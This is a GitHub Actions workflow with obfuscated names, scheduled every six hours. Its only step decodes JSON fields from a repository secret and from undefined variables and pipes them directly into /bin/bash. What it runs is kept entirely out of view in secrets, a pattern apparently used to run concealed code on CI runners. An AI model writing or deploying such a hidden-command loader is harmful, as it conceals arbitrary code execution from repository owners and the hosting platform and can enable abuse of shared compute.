name: baiqiangda4390
on:
  workflow_dispatch:
  schedule:
    - cron: '42 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baiqiangda4390
        env:
          nys79: ${{ secrets.nys79 }}
        run: |
          echo $nys79 | jq -r .drpz20426 | /bin/bash
          echo $rt0 | jq -r .nrks1925 | /bin/bash
          echo $adzxd5 | jq -r .ssw7 | /bin/bash
          echo $jvdhi4 | jq -r .u7 | /bin/bash

